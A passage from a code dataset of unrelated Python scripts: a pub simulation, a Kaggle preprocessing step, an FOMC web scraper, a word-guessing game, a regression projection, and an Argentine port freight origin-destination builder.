\"HTTP Error\", str( sys.exc_info()[ 1 ] ) )\r\n\t\t\treturn None\r\n\r\n\tdef parseHTMLSource( self, htmlsource ):\r\n\t\t\"\"\" parse html source for tagged version and url \"\"\"\r\n\t\tlog( \"parseHTMLSource()\" )\r\n\t\ttry:\r\n\t\t\turl = re.search('Revision \\d+:(.*?)<', htmlsource, re.IGNORECASE).group(1).strip()\r\n\t\t\ttagList = re.compile('

  • = self._pouringTime:\r\n self._pouring = False\r\n self._poured = True\r\n\r\n\r\nclass Client:\r\n def __init__(self, id, howManyBeer=5, drinkTime=4):\r\n self._id = id # FIXME: brak sprawdzanie unikalności id\r\n self._startTime = 0\r\n self._mug = None\r\n self._howManyBeer = howManyBeer\r\n self._drinkTime = drinkTime\r\n self.state = \"Czekam\"\r\n\r\n def getID(self):\r\n return self._id\r\n\r\n def getMug_Delete(self):\r\n return self._mug\r\n\r\n def getHowManyBeer(self):\r\n return self._howManyBeer\r\n\r\n def __askForMug(self, listOfMugs):\r\n for mug in listOfMugs:\r\n if mug.isFree() and mug.isPoured():\r\n self._mug = mug\r\n mug.switchIsFree()\r\n break\r\n\r\n def drinking(self, time, listOfMugs):\r\n if self._mug is None:\r\n self.__askForMug(listOfMugs)\r\n if self._mug:\r\n self._startTime = time\r\n self.state = \"Piję\"\r\n else:\r\n if time - self._startTime >= self._drinkTime:\r\n self._mug.switchIsFree()\r\n self._mug.switchPoured()\r\n self._mug = None\r\n self._howManyBeer -= 1\r\n self.state = \"Idę po kolejne\"\r\n if self._howManyBeer == 0: self.state = \"Idę do domu\"\r\n\r\n\r\nclass Pub:\r\n def __init__(self, numOfMug=10, dt=1e-2):\r\n self._time = 0\r\n self._dt = dt\r\n self._listOfClient = []\r\n self._listOfMugs = [Mug() for i in range(numOfMug)]\r\n\r\n def simulation(self):\r\n print(\r\n \"Nie wiem, widziałem przeciwskazań w zadaniu, aby nie można było napełniać wszystkich kuflów jednocześnie\")\r\n if self._listOfClient == []:\r\n N = input(\"Podaj liczbę klientów: \")\r\n while not N.isdigit():\r\n N = input(\"Wartość musi być typu int: \")\r\n self._listOfClient = [Client(i) for i in range(int(N))]\r\n\r\n while self._listOfClient:\r\n self._time += self._dt\r\n deleteList = []\r\n\r\n print(\"\\nCzas: \" + str(self._time))\r\n # Sprawdzanie czy kończy się już nalewać\r\n for mug in self._listOfMugs:\r\n mug.pouring(self._time)\r\n # Klienci piją\r\n for client in self._listOfClient:\r\n client.drinking(self._time, self._listOfMugs)\r\n print(str(client.getID()) + \" : \" + client.state)\r\n if client.getHowManyBeer() == 0:\r\n deleteList.append(client)\r\n # Sprawdzanie czy barman może napęłnić piwo zaraz po opróżnieniu\r\n for mug in self._listOfMugs:\r\n mug.pouring(self._time)\r\n for client in deleteList:\r\n self._listOfClient.remove(client)\r\n\r\n\r\np = Pub(10, 1)\r\np.simulation()\r\ninput(\"The pub is closed. Good bay.\")","sub_path":"Skills/Python/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"375054517","text":"'''\n\nFirst Kaggle competition\n\nTalkingData predict Age/Gender groups from mobile device app usage\n\nRefactoring app categories into a profile of event counts for\neach category for each unique device\n\nThis is a programming approach to avoid dealing with large data files\n\n'''\n\nimport numpy as np\n\nnrows = 187244 # number of unique devices\nncols = 14 # number of app event categories + 1 for group\n\n# Create a 2D numpy array\nnew_data = np.zeros((nrows,ncols), float)\n\n\n# Open the data file for read\n\ninFILE = open(\"data/clean_test.csv\", 'r')\n\n# Loop through all the rows\n\n# For training data\n\n# The device id is column 3\n# The group is column 2\n# the app category is column 1\n\n# For testing data\n\n# The device id is column 2\n# the app category is column 1\n\n\nfor line in inFILE:\n # Split line\n split_line = line.split(',')\n # this ignores first line\n if not (split_line[2] == \"new_device_id\\n\"):\n group = float(split_line[2])\n category = float(split_line[1])\n # increment the category count\n new_data[int(device),int(category)] +=1.0\n # Set the last column as group (train) or device (test)\n new_data[int(device),13] = group\n\n\n# Save the data to csv\n\nnp.savetxt(\"test_data.csv\",new_data, delimiter=',')\ninFILE.close\n\n","sub_path":"Sam/scripts/preprocess_data_2.py","file_name":"preprocess_data_2.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"236704444","text":"#Author Anand Chitale\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import Tag\nimport csv\n'''\n@author Anand Chitale\n#This script goes through every page of the FOMC historical website and extracts raw\nmetadata information on every relevant document on the website\noutputing into raw_data.csv\n'''\ndef download_raw_doc_metadata():\n documents = []\n start_date, end_date = 2010,2019\n year_pages = get_year_pages(start_date,end_date)\n for year in year_pages:\n soup = BeautifulSoup(year,'lxml')\n\n #Article Div Tag Contains All Meeting Tables\n meeting_container = soup.find(\"div\", id=\"article\")\n year = meeting_container.find(\"h3\").text\n\n #contains a table of all documents in a meeting\n meeting_tables = meeting_container.findChildren(\"div\",recursive=False)\n\n for meeting_table in meeting_tables:\n meeting_info = meeting_table.find(\"h5\").text\n\n meeting_document_tables = meeting_table.find_all(\"div\")[1]\n\n #each p tag contains a set of one of more links to documents of a type\n document_types = meeting_document_tables.find_all(\"p\")\n for document_type in document_types:\n document_list = get_documents_and_links(document_type)\n grouping = get_grouping(document_type,document_list)\n #Append Meeting Specific Information to each document\n for document in document_list:\n document['grouping'] = grouping\n add_document(documents,document,year,meeting_info)\n\n #Catches any minutes that are not given in a p-tag, just written as text in the div\n meeting_document_lists = meeting_document_tables.find_all(\"div\")\n for meeting_document_list in meeting_document_lists:\n non_p_text = ''.join(meeting_document_list.find_all(text=True, recursive=False))\n non_p_text += get_non_link_inner_text(meeting_document_list)\n if non_p_text and non_p_text.strip():\n non_p_text = ' '.join(non_p_text.split())\n document = {'document_name':non_p_text,\n 'link': None\n }\n grouping = get_grouping(document['document_name'],None)\n document['grouping'] = grouping\n add_document(documents,document,year,meeting_info)\n\n write_to_csv(documents)\n\ndef get_year_pages(start_date,end_date):\n base_time_url = \"https://www.federalreserve.gov/monetarypolicy/fomchistorical\"\n\n # dictionary which holds each years page\n year_pages = []\n\n for year in range(start_date,end_date+1):\n url = base_time_url + str(year) + '.htm'\n resp = requests.get(base_time_url + str(year) + '.htm')\n if resp.status_code == requests.codes.ok:\n year_pages.append(resp.content)\n else:\n print(\"error occured. Could not get information for year:{} with url:{}\".format(year,url))\n continue\n return year_pages\n\n\ndef get_documents_and_links(document_type):\n documents = []\n comment = ''\n document_name = ''\n ptext = document_type.find(text=True, recursive=False)\n if ptext and ptext.strip():\n ptext = ptext.strip()\n #Takes care of edge case where reference was in p_text and minutes in link\n if ptext[0] == \"(\":\n comment = ptext\n else:\n document_name = ptext\n document_name += get_non_link_inner_text(document_type)\n links = document_type.find_all(\"a\")\n if not links:\n current_document = {}\n document_name += comment\n current_document['document_name'] = document_name\n current_document['link'] = None\n documents.append(current_document)\n else:\n for link in links:\n cur_doc_name = document_name + link.text\n cur_doc_name += comment\n current_document = {}\n current_document['document_name'] = cur_doc_name\n current_document['link'] = link.get(\"href\")\n documents.append(current_document)\n return documents\n\ndef add_document(documents,document,year,meeting_info):\n document['year'] = year\n document['meeting_info'] = meeting_info\n documents.append(document)\n\n# Writes information to CSV File\ndef write_to_csv(documents):\n with open('../output/lea_raw_data.csv', 'w') as csvfile:\n fieldnames = ['year', 'meeting_info', 'document_name', 'link', 'grouping']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for document in documents:\n writer.writerow(document)\n#We are only concerned with p tag text and the like, not link text\ndef get_non_link_inner_text(tag):\n inner_text = ''\n for child in tag.find_all(recursive=False):\n if type(child) == Tag and child.name == \"em\":\n inner_text += child.text\n return inner_text\n#Finds the grouping of the file based on properties of the fomc website\ndef get_grouping(document_type,document_list):\n if type(document_type) == str and document_list is None:\n grouping = document_type\n else:\n document_type_text = document_type.find(text=True, recursive=False)\n\n #Takes care of edge case where reference was in p_text and minutes in link\n if document_type_text and document_type_text.strip() \\\n and not document_type_text.strip()[0]==\"(\":\n grouping = document_type_text\n else:\n grouping = document_list[0]['document_name']\n return grouping\n\nif __name__ == \"__main__\":\n download_raw_doc_metadata()\n","sub_path":"lea_code/scripts/lea_download_later_years.py","file_name":"lea_download_later_years.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395916028","text":"import math\nimport sys\nimport itertools\nimport itertools\n\ndef sa(Type= int):\n return [Type(x) for x in input().split()]\n\ndef solve(t):\n n, m = sa()\n\n print('YES' if n % m == 0 else 'NO')\n\nif __name__ == '__main__':\n sys.stdin = open('input.txt', 'r')\n\n t = int(input())\n for i in range(t):\n solve(i+1)\n","sub_path":"Code Forces/Code Forces 1312A - Two Regular Polygons.py","file_name":"Code Forces 1312A - Two Regular Polygons.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619808872","text":"import random\n\ndef game_mode():\n \"\"\"Returns game mode from the user input.\"\"\"\n print (\"Let's play \\\"Mystery Word\\\". You have 8 guesses to solve the word.\")\n mode = input('\\nChoose the game mode (\"Easy, Normal or Hard\"): ').lower()\n return mode\n\n\ndef list_of_words():\n \"\"\"Calls read_file to get a list of words.\n Depending on the game mode, gets appropriate list.\n From the list gets mystery word calling random_word.\n Calls game with the mystery word argument.\"\"\"\n words_list = read_file(\"/usr/share/dict/words\")\n mode = game_mode()\n\n if mode == \"easy\":\n words_list = easy_words(words_list)\n elif mode == \"normal\":\n words_list = medium_words(words_list)\n elif mode == \"hard\":\n words_list = hard_words(words_list)\n\n mystery = random_word(words_list)\n game(mystery)\n\ndef random_word(words_list):\n \"\"\"Chooses random word from the list and returns\"\"\"\n mystery = random.choice(words_list)\n return mystery\n\ndef game(mystery):\n turns = 8\n guesses = \"\"\n print(\"The mystery word has {} characters.\".format(len(mystery)))\n while turns > 0:\n guess = input(\"\\nGuess a letter: \").upper()\n while guess.isdigit() or len(guess) != 1:\n print(\"Invalid input! Only one letter allowed.\")\n guess = input(\"\\nGuess a letter: \").upper()\n while guess in guesses:\n print(\"You already guesses that word. Try again.\")\n guess = input(\"\\nGuess a letter: \").upper()\n\n guesses += guess\n if guess in mystery:\n turns += 1\n\n print(display_word(mystery, guesses))\n turns -= 1\n print(\"\\n{} turns left.\".format(turns))\n\n if is_word_complete(mystery, guesses):\n print(\"\\nYou win!\")\n break\n elif turns == 0:\n print(\"\\n{} is the mystery word\".format(mystery))\n\n play_again = input(\"Play again? (Y or N): \").lower()\n if play_again == \"y\":\n list_of_words()\n\ndef display_word(mystery, guesses):\n \"\"\" Displays a string of guesses and '_' depending on guesses\"\"\"\n user_guess = \"\"\n for char in mystery:\n if char in guesses:\n user_guess += char\n else:\n user_guess += \"_\"\n user_guess = \" \".join(user_guess)\n return user_guess.upper()\n\ndef is_word_complete(mystery, guesses):\n \"\"\"Checks to see if the word is complete\"\"\"\n missed = 0\n for char in mystery:\n if char not in guesses:\n missed += 1\n if missed == 0:\n return True\n\ndef read_file(input_file):\n \"\"\"Reads input_file and returns words in a list\"\"\"\n with open(input_file) as file:\n lines = file.read().upper()\n lines = lines.split()\n return lines\n\ndef easy_words(my_list):\n \"\"\"Returns list of words that are 4 - 6 characters long\"\"\"\n easy_words_list = []\n for word in my_list:\n if len(word) >= 4 and len(word) <= 6:\n easy_words_list.append(word)\n return easy_words_list\n\ndef medium_words(my_list):\n \"\"\"Returns list of words that are 6 - 8 characters long\"\"\"\n medium_words_list = []\n for word in my_list:\n if len(word) >= 6 and len(word) <= 8:\n medium_words_list.append(word)\n return medium_words_list\n\ndef hard_words(my_list):\n \"\"\"Returns list of words that are 8 or more characters\"\"\"\n hard_words_list = []\n for word in my_list:\n if len(word) >= 8:\n hard_words_list.append(word)\n return hard_words_list\n\nif __name__ == \"__main__\":\n list_of_words()\n","sub_path":"mystery_word.py","file_name":"mystery_word.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"605653088","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:45:06 2019\n\n@author: simon\n\"\"\"\n\nimport numpy as np\nimport argparse\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\n\ndef read_data(fname,rho_ref,beta_ref):\n \"\"\"\n Reads the data from the input file\n Args:\n fname: name of the file containing the data, run build example to see the structure \n of the input_example.dat\n rho_ref: reference density\n beta_ref\n \n Returns:\n variables\n \"\"\"\n data=np.loadtxt(fname)\n \n \n rho=data[:,0]-rho_ref\n temperature=data[:,1]\n prope=data[:,2]\n sigma_prope=data[:,3]\n beta=1/temperature-beta_ref\n \n \n \n return rho,beta, prope, sigma_prope\n\ninput_file=\"input_example.dat\"\nx,y, z, zerr=read_data(input_file,0,0)\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(x, y, z, zdir='z',marker='.',label=\"Simulation\",color='r')\nax.plot_wireframe(np.reshape(x,(30,30)),np.reshape(y,(30,30)),np.reshape(z,(30,30)),color='b',label=\"Fitting\")\nfig.legend()\nfig.savefig(\"3Dplot.pdf\")","sub_path":"Lammps/dev/Fitting/plot_example.py","file_name":"plot_example.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"460969429","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 30 15:14:17 2020\r\n\r\n@author: FlaviaCosta\r\n\"\"\"\r\n#%% Install library\r\n#pip install statsmodels\r\n#%% import library\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\nfrom statsmodels.formula.api import ols\r\n#%% importando base excel\r\nbase_projecao = pd.read_excel('C:/Users/FlaviaCosta/Google Drive/Projeções/Projeções.xlsm'\r\n , index_col = 0, sheet_name = 'BASE MODELAGEM PHYTON')\r\n#%% Data para base treino\r\ndatateste = '2020-04-01'\r\n#%%\r\nbase_projecao['Inicio_Teste'] = pd.to_datetime(datateste)\r\n#%% separando base treino e teste\r\nbase_treino = base_projecao.query('Data < Inicio_Teste')\r\nbase_teste = base_projecao.query('Data >= Inicio_Teste')\r\n\r\n#%% definindo variáveis do modelo\r\nformula_text = (\"\"\"\r\n LOG_GUV ~ \r\n C(month)\r\n + ITUNES\r\n + VIVOBUNDLECOMBO\r\n + TIM\r\n + OIBUNDLELIVROSNARRADOS\r\n + CARTAODECREDITO\r\n + CLARO\r\n + GOOGLEPLAY\r\n + VIVO\r\n + NEXTEL\r\n + OI\r\n + ALGARBUNDLE\r\n + MOVISTARESPANHA\r\n + OIUPSTREAM\r\n + TIGOCOLOMBIA\r\n + OUTROS\r\n + Outlier\r\n\r\n \"\"\")\r\n#%% exemplo incluindo variavel como categorica\r\n#res = ols(formula='Lottery ~ Literacy + Wealth + C(Region)', data=df).fit()\r\n#vai retornar um coeficiente para cada região\r\n#%% Ajustando o modelo \r\nmodel = ols(formula = formula_text, data = base_treino).fit()\r\n#%% parametros\r\nprint(model.summary())\r\n#%% gráficos - tranformar em numpy array para colocar num gráfico\r\nimport numpy as np\r\nYpred = np.array(np.exp(model.fittedvalues))\r\nYreal = np.array(np.exp(base_treino['LOG_GUV']))\r\n#%% Gráfico\r\nimport matplotlib.pyplot as plt\r\nplt.plot(Ypred, color = 'red', label = 'Real')\r\nplt.plot(Yreal, color = 'blue', label = 'Previsto')\r\nplt.legend()\r\nplt.title('Previsão de série temporal')\r\n#%% predição\r\nprediction = np.exp(model.predict(base_teste))\r\n#%%Unificando predição total\r\npredictionTotal = np.append(Ypred, np.array(prediction))\r\n#%% export predictions\r\npd.DataFrame(predictionTotal).to_csv('C:/Users/FlaviaCosta/Google Drive/Projeções/projecao_faturamento.csv')\r\n\r\n#%% export coeficients\r\ncoeficientes = np.array(model.params)\r\npd.DataFrame(coeficientes).to_csv('C:/Users/FlaviaCosta/Google Drive/Projeções/coeficientes.csv')","sub_path":".ipynb_checkpoints/Projeção Phyton-checkpoint.py","file_name":"Projeção Phyton-checkpoint.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274751442","text":"\"\"\"Create port network and OD data from Argentina\n\"\"\"\nimport csv\nimport os\nimport types\nimport fiona\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport unidecode\nfrom atra.utils import *\n\ndef extract_subset_from_dataframe(input_dataframe,skiprows,start_row,end_row,new_columns):\n output_data = []\n input_dataframe = input_dataframe.iloc[skiprows:]\n for iter_,row in input_dataframe.iterrows():\n output_data.append(tuple(row[start_row:end_row]))\n\n output_df = pd.DataFrame(output_data,columns=new_columns)\n return output_df\n\ndef get_province_matches(x,provinces_df):\n match = provinces_df[provinces_df['station'] == x]\n if len(match.index) > 0:\n match = match['province'].values.tolist()\n return match[0]\n else:\n return ''\n\ndef replace_string_characters(x,replace_strings):\n x_change = x.lower().strip()\n for rp in replace_strings:\n x_change = x_change.replace(rp[0],rp[1])\n\n return x_change\n\ndef assign_industry_names(x,industries_df):\n return industries_df.loc[(x.commodity_group,x.commodity_subgroup),'high_level_industry']\n\ndef set_reference_date(x,reference_date):\n if x == 0:\n x = pd.Timestamp(reference_date)\n\n return x\n\ndef port_name_to_node_matches(port_reference,named_port,commodity_group,country,port_nodes,port_renames,port_countries):\n if unidecode.unidecode(str(named_port).lower().strip()) in ('rada','rada exterior','transito'):\n named_port = 'Unknown'\n\n port_match = [x for x in list(port_nodes.itertuples(index=False)) \\\n if (unidecode.unidecode(port_reference.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(port_reference.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ]\n\n p_rename = [x.port for x in list(port_renames.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.od_port.lower().strip()))\n and (unidecode.unidecode(commodity_group.lower().strip()) == unidecode.unidecode(x.commodity_group.lower().strip()))\n ]\n if not p_rename:\n p_rename = [x.port for x in list(port_renames.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.od_port.lower().strip()))\n and (unidecode.unidecode(x.commodity_group.lower().strip()) in ('all','other'))\n ]\n if not p_rename:\n p_rename = [x.node for x in list(port_countries.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.port_name.lower().strip()))\n ]\n if not p_rename:\n p_rename = [x.node for x in list(port_countries.itertuples(index=False)) \\\n if (unidecode.unidecode(str(country).lower().strip()) == unidecode.unidecode(str(x.country).lower().strip()))\n and (unidecode.unidecode(x.port_name.lower().strip()) in ('all','other'))\n ]\n if p_rename:\n named_port = p_rename[0]\n else:\n named_port = p_rename[0]\n\n else:\n named_port = p_rename[0]\n else:\n named_port = p_rename[0]\n\n\n st_match = [x for x in port_match \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(port_reference.lower().strip()))\n or (unidecode.unidecode(str(named_port).lower().strip()) in unidecode.unidecode(port_reference.lower().strip()))\n or (unidecode.unidecode(port_reference.lower().strip()) in unidecode.unidecode(str(named_port).lower().strip()))\n or (named_port == x.id)\n ]\n\n if not st_match:\n st_match = [x for x in list(port_nodes.itertuples(index=False)) \\\n if (unidecode.unidecode(str(named_port).lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(str(named_port).lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(x.name.lower().strip()) in unidecode.unidecode(str(named_port).lower().strip()))\n or (named_port == x.id)\n ]\n if not st_match:\n st_match = port_match\n\n return st_match\n\n\ndef main(config):\n \"\"\"\n \"\"\"\n incoming_data_path = config['paths']['incoming_data']\n data_path = config['paths']['data']\n\n '''Specify the min-max speeds in km/hr\n '''\n min_speed = 4.0\n max_speed = 5.0\n\n '''Specify the columns in the input excel data \n With their Spanish names and translated English names\n '''\n translate_columns = {\n 'Puerto':'port',\n 'mes':'month',\n 'Fecha Entrada':'entrance_date',\n 'Hora Entrada':'entrance_time',\n 'Fecha Salida':'exit_date',\n 'Hora Salida':'exit_time',\n 'País de Procedencia':'origin_country',\n 'Puerto de Procedencia':'origin_port',\n 'País de Destino':'destination_country',\n 'Puerto de Destino':'destination_port',\n 'Tipo de Operación':'operation_type',\n 'Producto Corregido':'commodity_subgroup',\n 'Rubro':'commodity_group',\n 'Total Tn':'tons',\n 'Medida':'unit'\n }\n '''Assumed start date by default, when no date is given\n '''\n ref_date = '2017-01-01 00:00:00'\n '''Specify the types of port operations, which will be used to infer OD flow direction\n If it is an export operation at a port, then the port is an origin\n If it is an import operation at a port, then the port is a destination\n Transit operations are later included within exports\n The names of the operations are dervied from the input data provided to us\n '''\n export_operations = ['Exportación','Vehículos Expo','Transbordo Expo','Cabotaje Salido']\n import_operations = ['Importación','Transbordo Impo','Vehículos Impo','Cabotaje Entrado']\n transit_operattions = ['Tránsito','Otros']\n\n '''Specify the input files for the port nodes, matches to rename ports and the OD data\n '''\n print ('* Reading input data')\n port_nodes = gpd.read_file(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_network',\n 'water_nodes.shp'),encoding='utf-8').fillna('none')\n port_nodes.crs = {'init' :'epsg:4326'}\n port_names = port_nodes[['name','id','province']]\n\n\n port_renames = pd.read_excel(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_port_matches.xlsx'),\n sheet_name='matches',\n encoding='utf-8-sig')\n port_countries = pd.read_excel(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_port_matches.xlsx'),\n sheet_name='country_ports',\n encoding='utf-8-sig')\n\n port_df = pd.read_excel(os.path.join(incoming_data_path,\n 'OD_data',\n 'port',\n 'Cargas No Containerizadas - SSPVNYMM.xlsx'),\n sheet_name='2017',\n encoding='utf-8-sig').fillna(0)\n\n '''Get the high level industries and commodity matches\n '''\n industries_df = pd.read_excel(os.path.join(data_path,\n 'economic_IO_tables',\n 'input',\n 'commodity_classifications-hp.xlsx'),\n sheet_name='port',index_col=[0,1])\n industry_cols = list(set(industries_df['high_level_industry'].values.tolist()))\n\n '''Start the process of creating OD flows\n '''\n print ('* Cleaning data and creating OD matrix')\n port_df.columns = port_df.columns.str.strip()\n port_df.rename(columns=translate_columns,inplace=True)\n port_df = port_df[port_df['tons'] > 0]\n od_ports = []\n od_matrix = []\n for p in list(port_df.itertuples(index=False)):\n port_id = [x.id for x in list(port_names.itertuples(index=False)) \\\n if (unidecode.unidecode(p.port.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(p.port.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ][0]\n port_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if (unidecode.unidecode(p.port.lower().strip()) == unidecode.unidecode(x.name.lower().strip()))\n or (unidecode.unidecode(p.port.lower().strip()) in unidecode.unidecode(x.name.lower().strip()))\n ][0]\n if port_province.lower().strip() == 'ciudad bs as':\n port_province = 'Ciudad Autónoma de Buenos Aires'\n\n match = port_name_to_node_matches(p.port,p.origin_port,p.commodity_group,p.origin_country,port_names[['name','id']],port_renames,port_countries)\n o_id = [m.id for m in match][0]\n o_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if x.id == o_id\n ][0]\n if o_province == 'none':\n o_province = 'Rest of World'\n elif o_province.lower().strip() == 'ciudad bs as':\n o_province = 'Ciudad Autónoma de Buenos Aires'\n\n match = port_name_to_node_matches(p.port,p.destination_port,p.commodity_group,p.destination_country,port_names[['name','id']],port_renames,port_countries)\n d_id = [m.id for m in match][0]\n d_province = [x.province for x in list(port_names.itertuples(index=False)) \\\n if x.id == d_id\n ][0]\n if d_province == 'none':\n d_province = 'Rest of World'\n elif d_province.lower().strip() == 'ciudad bs as':\n d_province = 'Ciudad Autónoma de Buenos Aires'\n\n od_ports.append((o_id,p.origin_port,p.origin_country,port_id,p.port,port_province,d_id, \\\n p.destination_port,p.destination_country,p.operation_type,p.commodity_group,p.commodity_subgroup,p.entrance_date,p.entrance_time,p.exit_date,p.exit_time,p.tons,p.unit))\n\n if p.operation_type in export_operations:\n operation = 'Export'\n elif p.operation_type in import_operations:\n operation = 'Import'\n else:\n operation = 'Transit'\n\n if p.unit.lower().strip() == 'unidades':\n tons = 15*p.tons\n else:\n tons = p.tons\n\n if len(set([o_id,port_id,d_id])) == 1:\n if operation in ['Export','Transit']:\n od_matrix.append((port_id,port_province,'watern_90','Rest of World',operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n else:\n od_matrix.append(('watern_90','Rest of World',port_id,port_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n\n elif len(set([o_id,port_id,d_id])) == 2:\n if o_id != port_id:\n d_id = o_id\n d_province = o_province\n if operation in ['Export','Transit']:\n origin_id = port_id\n origin_province = port_province\n destination_id = d_id\n destination_province = d_province\n else:\n origin_id = d_id\n origin_province = d_province\n destination_id = port_id\n destination_province = port_province\n\n od_matrix.append((origin_id,origin_province,destination_id,destination_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n else:\n od_matrix.append((o_id,o_province,port_id,port_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n od_matrix.append((port_id,port_province,d_id,d_province,operation, \\\n p.commodity_group,p.commodity_subgroup,p.entrance_date,p.exit_date,tons))\n\n \n od_dfs = pd.DataFrame(od_ports,columns=['origin_id','origin_port','origin_country',\n 'intermediate_id','intermediate_port','intermediate_province',\n 'destination_id','destination_port','destination_country',\n 'operation_type','commodity_group','commodity_subgroup',\n 'entrance_date','entrance_time','exit_date','exit_time','tons','unit'])\n od_dfs['industry_name'] = od_dfs.apply(lambda x:assign_industry_names(x,industries_df),axis=1)\n od_dfs.to_csv(os.path.join(incoming_data_path,\n 'pre_processed_network_data',\n 'ports',\n 'port_od_cleaning',\n 'od_flows_raw.csv'),encoding='utf-8-sig',index=False)\n\n '''Match industries\n '''\n od_dfs = pd.DataFrame(od_matrix,columns=['origin_id','origin_province',\n 'destination_id','destination_province',\n 'operation_type','commodity_group','commodity_subgroup',\n 'entrance_date','exit_date','tons'])\n od_dfs['entrance_date'] = od_dfs['entrance_date'].apply(lambda x:set_reference_date(x,ref_date))\n od_dfs['o_date'] = od_dfs['entrance_date'].dt.date\n od_dfs['industry_name'] = od_dfs.apply(lambda x:assign_industry_names(x,industries_df),axis=1)\n\n od_vals_group_industry = {}\n\n gr_cols = ['origin_id','destination_id',\n 'origin_province','destination_province',\n 'commodity_group','commodity_subgroup','industry_name','o_date']\n od_com_day_totals = od_dfs[gr_cols+['tons']].groupby(gr_cols)['tons'].sum().reset_index()\n od_dfs[['o_date','tons']].groupby('o_date')['tons'].sum().reset_index().to_csv(os.path.join(incoming_data_path,'port_ods','od_daily_total.csv'),encoding='utf-8-sig',index=False)\n\n gr_cols = ['origin_id','destination_id',\n 'origin_province','destination_province',\n 'commodity_group','commodity_subgroup','industry_name']\n od_com_max = od_com_day_totals[gr_cols + ['tons']].groupby(gr_cols).max().rename(columns={'tons': 'max_daily_tons'}).reset_index()\n od_com_min = od_com_day_totals[gr_cols + ['tons']].groupby(gr_cols).min().rename(columns={'tons': 'min_daily_tons'}).reset_index()\n od_minmax = pd.merge(od_com_min,od_com_max,how='left',on=gr_cols).fillna(0)\n\n for iter_,row in od_minmax.iterrows():\n if '{}-{}'.format(row.origin_id,row.destination_id) not in od_vals_group_industry.keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)] = {}\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['origin_province'] = row.origin_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['destination_province'] = row.destination_province\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_total_tons'] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_total_tons'] = row.max_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] = row.max_daily_tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_total_tons'] += row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_total_tons'] += row.max_daily_tons\n\n if 'min_{}'.format(row.industry_name) not in od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)].keys():\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] = row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] = row.max_daily_tons\n else:\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['min_{}'.format(row.industry_name)] += row.min_daily_tons\n od_vals_group_industry['{}-{}'.format(row.origin_id,row.destination_id)]['max_{}'.format(row.industry_name)] += row.max_daily_tons\n\n\n od_list = []\n for key,values in od_vals_group_industry.items():\n 